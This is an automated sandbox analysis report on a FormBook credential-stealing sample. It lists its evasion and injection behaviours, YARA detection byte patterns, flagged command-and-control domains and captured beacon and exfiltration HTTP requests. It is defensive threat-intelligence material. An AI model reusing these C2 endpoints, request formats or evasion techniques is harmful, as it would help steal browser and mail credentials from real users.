
Analysis Report CN03716-2020.exe

Overview

General Information

Sample Name: CN03716-2020.exe
Analysis ID: 288138
MD5: dd3f06103f2ac425cf4e5a6dc65d31d6
SHA1: 972a1b325cc3abc48a94c90a7b51faea619cfcc9
SHA256: 262d8dd389aad1ef11023ded97da5703e88f1a96c2b0b8a1dbdde5fa7ee04022
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • CN03716-2020.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\CN03716-2020.exe' MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6952 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6960 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
    • CN03716-2020.exe (PID: 6968 cmdline: C:\Users\user\Desktop\CN03716-2020.exe MD5: DD3F06103F2AC425CF4E5A6DC65D31D6)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 5404 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 2956 cmdline: /c del 'C:\Users\user\Desktop\CN03716-2020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.246609407.0000000002788000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.CN03716-2020.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.CN03716-2020.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.CN03716-2020.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17549:$sqlite3step: 68 34 1C 7B E1
  • 0x1765c:$sqlite3step: 68 34 1C 7B E1
  • 0x17578:$sqlite3text: 68 38 2A 90 C5
  • 0x1769d:$sqlite3text: 68 38 2A 90 C5
  • 0x1758b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176b3:$sqlite3blob: 68 53 D8 7F 8C
3.2.CN03716-2020.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.CN03716-2020.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview



AV Detection:

Antivirus / Scanner detection for submitted sample
Source: CN03716-2020.exe | Avira: detected
Antivirus detection for URL or domain
Source: http://www.kardus6.xyz | Avira URL Cloud: Label: malware
Source: http://www.larvashop.net/cmg/www.8936199.com | Avira URL Cloud: Label: malware
Source: http://www.caneryis.com | Avira URL Cloud: Label: malware
Source: http://www.kardus6.xyz/cmg/ | Avira URL Cloud: Label: malware
Source: http://www.fastroot.club/cmg/ | Avira URL Cloud: Label: malware
Source: http://www.fastroot.club/cmg/www.larvashop.net | Avira URL Cloud: Label: malware
Source: http://www.iaimorganic.com/cmg/www.shizukis2.com | Avira URL Cloud: Label: malware
Source: http://www.caneryis.com/cmg/www.irelandjoy.com | Avira URL Cloud: Label: malware
Source: http://www.iaimorganic.com | Avira URL Cloud: Label: malware
Source: http://www.iaimorganic.com/cmg/ | Avira URL Cloud: Label: malware
Source: http://www.larvashop.net | Avira URL Cloud: Label: malware
Source: http://www.kardus6.xyz/cmg/?7ntXxXIX=I0lrKqqP1MjreNOO9oMGFrx+rt2jE/QVhMf4sTzELVzYBASHhWo55iqsoHUB4gn2BcSZ&lN60-=WZA4zv6HmZTdfD | Avira URL Cloud: Label: malware
Source: http://www.fastroot.club | Avira URL Cloud: Label: malware
Source: http://www.shizukis2.com/cmg/www.dropofluxe.com | Avira URL Cloud: Label: malware
Source: http://www.shizukis2.com/cmg/ | Avira URL Cloud: Label: malware
Source: http://www.yumnamccann.com/cmg/www.1089konstanzter.com | Avira URL Cloud: Label: malware
Source: http://www.larvashop.net/cmg/ | Avira URL Cloud: Label: malware
Source: http://www.shizukis2.com | Avira URL Cloud: Label: malware
Source: http://www.yumnamccann.com/cmg/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: CN03716-2020.exe | Virustotal: Detection: 20%
Source: CN03716-2020.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: CN03716-2020.exe | Joe Sandbox ML: detected
Source: 3.2.CN03716-2020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49742
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /cmg/?7ntXxXIX=I0lrKqqP1MjreNOO9oMGFrx+rt2jE/QVhMf4sTzELVzYBASHhWo55iqsoHUB4gn2BcSZ&lN60-=WZA4zv6HmZTdfD HTTP/1.1 | Host: www.kardus6.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /cmg/?7ntXxXIX=kAH2BVdei1D7vSU7rMaayjSrbmqTqpimfamt4+2RIqx0uV21MEskAWuR+lK+LZwTVH6P&lN60-=WZA4zv6HmZTdfD HTTP/1.1 | Host: www.rootforequality.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected: POST /cmg/ HTTP/1.1 | Host: www.rootforequality.com | Connection: close | Content-Length: 414 | Cache-Control: no-cache | Origin: http://www.rootforequality.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.rootforequality.com/cmg/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Data Ascii: 7ntXxXIX=siLMf18th2vs5ilm8Ir4iWS9QkfBo6OMI6vv~-KIBaV-kF2KE15uACqc92yeLIV5dWXQZ6FKsqyPqAww5125uBzZxc9ZgYKnoO1DsBdAd3ymYmbPLZ1QiR6u1D7VxHjkSwmt8RxSu1aE8G3tvFG_nCI0YwCrEDQSZCvKcQAC8zOwszSrhOGnNR4I9MnDsilFK7ZgjsSB9dl1S054RC626eCntcy8ZLe5bemgnSH-6001GFDvcu(G~0sG~0vx5yPz00QOHA5zDGIGx-DDAI(_LokL(jl6IN~oBAG3vbliCCgbiVQvqgjYdsfDu_trz4qyYOlQCYTdGhOd53MKEt0_uc~kPPjx76f_FmPsxIlc0OA6h6fzi3PJV7T2WEVoNW~q8eVRtcQ7hfShSndEsw).
Source: global traffic | HTTP traffic detected: POST /cmg/ HTTP/1.1 | Host: www.rootforequality.com | Connection: close | Content-Length: 163898 | Cache-Control: no-cache | Origin: http://www.rootforequality.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.rootforequality.com/cmg/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: unknown | DNS traffic detected: queries for: www.kardus6.xyz
Source: CN03716-2020.exe, 00000000.00000003.221388239.0000000005783000.00000004.00000001.sdmp | String found in binary or memory: http://en.wU&
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: CN03716-2020.exe, 00000000.00000002.246493177.0000000002721000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.1089konstanzter.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.1089konstanzter.com/cmg/
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.1089konstanzter.com/cmg/www.fastroot.club
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.1089konstanzter.comReferer:
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.8936199.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.8936199.com/cmg/
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.8936199.com/cmg/www.northminute.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.8936199.comReferer:
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: CN03716-2020.exe, 00000000.00000003.224417534.0000000005783000.00000004.00000001.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.caneryis.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.caneryis.com/cmg/
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.caneryis.com/cmg/www.irelandjoy.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.caneryis.comReferer:
Source: CN03716-2020.exe, 00000000.00000003.223655773.0000000005786000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: CN03716-2020.exe, 00000000.00000003.223582776.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com&E
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com/E-
Source: CN03716-2020.exe, 00000000.00000003.223410037.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com01
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com;3
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comC
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comcn
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: CN03716-2020.exe, 00000000.00000003.223488318.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comm)
Source: CN03716-2020.exe, 00000000.00000003.223582776.0000000005788000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comn
Source: CN03716-2020.exe, 00000000.00000003.223655773.0000000005786000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comwhi
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.dropofluxe.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.dropofluxe.com/cmg/
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.dropofluxe.com/cmg/www.ravomail.com
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.dropofluxe.comReferer:
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.fastroot.club
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.fastroot.club/cmg/
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.fastroot.club/cmg/www.larvashop.net
Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp | String found in binary or memory: http://www.fastroot.clubReferer:
Source: CN03716-2020.exe, 00000000.00000003.226480549.000000000577A000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.225207756.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: CN03716-2020.exe, 00000000.00000003.226849837.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmls
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: CN03716-2020.exe, 00000000.00000003.225682660.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersP
Source: CN03716-2020.exe, 00000000.00000003.228016814.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersRl
Source: CN03716-2020.exe, 00000000.00000003.225727936.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersers
Source: CN03716-2020.exe, 00000000.00000003.225727936.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersil
Source: CN03716-2020.exe, 00000000.00000003.227777910.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersr
Source: CN03716-2020.exe, 00000000.00000003.225241955.00000000057A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerssl
Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/n-
Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com=-
Source: CN03716-2020.exe, 00000000.00000003.227571067.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comFY-
Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comK-
Source: CN03716-2020.exe, 00000000.00000003.226480549.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: CN03716-2020.exe, 00000000.00000003.227700123.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comals=-
Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comce/
Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcom
Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comdmo2-
Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comdsed
Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comessed
Source: CN03716-2020.exe, 00000000.00000003.227571067.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comitud
Source: CN03716-2020.exe, 00000000.00000003.225219972.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comk
Source: CN03716-2020.exe, 00000000.00000003.225307436.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comld
Source: CN03716-2020.exe, 00000000.00000003.227933811.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comlic
Source: CN03716-2020.exe, 00000000.00000003.245028956.0000000005776000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.commamY-
Source: CN03716-2020.exe, 00000000.00000003.227097369.000000000577A000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comnc.
            Source: CN03716-2020.exe, 00000000.00000003.227933811.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.245028956.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
            Source: CN03716-2020.exe, 00000000.00000003.225307436.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como2-
            Source: CN03716-2020.exe, 00000000.00000003.228054736.0000000005784000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comu-
            Source: CN03716-2020.exe, 00000000.00000003.225989420.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueed/-
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: CN03716-2020.exe, 00000000.00000003.221025180.000000000578B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comca6pE
            Source: CN03716-2020.exe, 00000000.00000003.222335191.000000000577C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: CN03716-2020.exe, 00000000.00000003.223229397.000000000577C000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn$&
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: CN03716-2020.exe, 00000000.00000003.222318465.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0ED
            Source: CN03716-2020.exe, 00000000.00000003.222687558.0000000005786000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnb-
            Source: CN03716-2020.exe, 00000000.00000003.229294794.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.229079780.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: CN03716-2020.exe, 00000000.00000003.229859739.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.229294794.000000000577A000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.com/cmg/www.shizukis2.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.iaimorganic.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.com/cmg/www.iaimorganic.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.irelandjoy.comReferer:
